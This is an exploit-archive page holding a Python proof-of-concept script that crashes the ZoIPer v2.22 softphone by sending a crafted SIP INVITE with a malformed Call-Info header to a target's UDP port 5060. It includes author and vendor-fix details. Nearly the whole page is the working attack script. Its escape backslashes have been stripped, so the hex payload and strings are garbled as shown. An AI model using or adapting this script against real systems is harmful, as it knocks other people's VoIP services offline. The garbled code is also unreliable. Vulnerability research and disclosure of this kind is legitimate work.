ZoIPer Call-Info DoS

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : ZoIPer Call-Info DoS
# Published : 2009-10-14
# Author : Tomer Bitton
# Previous Title : NaviCOPA <= 3.0.1.2 Source Disclosure
# Next Title : Femitter HTTP Server 1.03 Remote Source Disclosure

#!/usr/bin/python

# ZoIPer v2.22 Call-Info Remote Denial Of Service.
# Remote Crash P.O.C.
# Author: Tomer Bitton (Gr33n_G0bL1n)
# Tested on Windows XP SP2 , SP3 , Ubuntu 8.10
#
# Vendor Notified on: 21/09/2009
# Vendor Fix: Fixed in version 2.24 Library 5324
#
# Bad Chars:   x20  ,  x09

import sys
import socket
import os


def main(argc , argv):

	if len(sys.argv) != 2:
		os.system("cls")
		sys.exit("Usage: " + sys.argv[0] + " <target_ip>n")
	
	target_host = sys.argv[1]
	target_port = 5060

	evil_packet =   "x49x4ex56x49x54x45x20x73x69x70x3ax4ex65x6fx40x31"+
					"x30x2ex30x2ex30x2ex31x20x53x49x50x2fx32x2ex30x0d"+
					"x0ax56x69x61x3ax20x53x49x50x2fx32x2ex30x2fx55x44"+
					"x50x20x31x39x32x2ex31x36x38x2ex35x37x2ex31x33x31"+
					"x3ax31x32x39x38x3bx62x72x61x6ex63x68x3dx7ax39x68"+
					"x47x34x62x4bx4ax52x6ex54x67x67x76x4dx47x6cx2dx36"+
					"x32x33x33x0dx0ax4dx61x78x2dx46x6fx72x77x61x72x64"+
					"x73x3ax20x37x30x0dx0ax46x72x6fx6dx3ax20x4dx6fx72"+
					"x70x68x65x75x73x20x3cx73x69x70x3ax4dx6fx72x70x68"+
					"x65x75x73x40x31x39x32x2ex31x36x38x2ex35x37x2ex31"+
					"x33x31x3ex3bx74x61x67x3dx66x37x6dx58x5ax71x67x71"+
					"x5ax79x2dx36x32x33x33x0dx0ax54x6fx3ax20x4ex65x6f"+
					"x20x3cx73x69x70x3ax4ex65x6fx40x31x30x2ex30x2ex30"+
					"x2ex31x3ex0dx0ax43x61x6cx6cx2dx49x44x3ax20x77x53"+
					"x48x68x48x6ax6ex67x39x39x2dx36x32x33x33x40x31x39"+
					"x32x2ex31x36x38x2ex35x37x2ex31x33x31x0dx0ax43x53"+
					"x65x71x3ax20x36x32x33x33x20x49x4ex56x49x54x45x0d"+
					"x0ax43x6fx6ex74x61x63x74x3ax20x3cx73x69x70x3ax4d"+
					"x6fx72x70x68x65x75x73x40x31x39x32x2ex31x36x38x2e"+
					"x35x37x2ex31x33x31x3ex0dx0ax43x6fx6ex74x65x6ex74"+
					"x2dx54x79x70x65x3ax20x61x70x70x6cx69x63x61x74x69"+
					"x6fx6ex2fx73x64x70x0dx0ax43x61x6cx6cx2dx49x6ex66"+
					"x6fx3ax20x20x0dx0ax43x6fx6ex74x65x6ex74x2dx4c"+
					"x65x6ex67x74x68x3ax20x31x32x35x0dx0ax0dx0a"
	
	os.system("cls")				
	print "[+] ZoIPer Call-Info Remote Denial Of Servicern"
	print "[+] Exploited By Gr33n_G0bL1nrn"
	print "[+] Connecting to %s on port %drn" % (target_host,target_port)
	
	s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
	try:
		s.connect((target_host,target_port))
		print "[+] Trying To Send Evil Packet...rn"
		s.sendall(evil_packet)
		s.close()
		print "[+] Done!rn"
	except:
		print "[x] Connection Error!rn"


if (__name__ == "__main__"):
	sys.exit(main(len(sys.argv), sys.argv))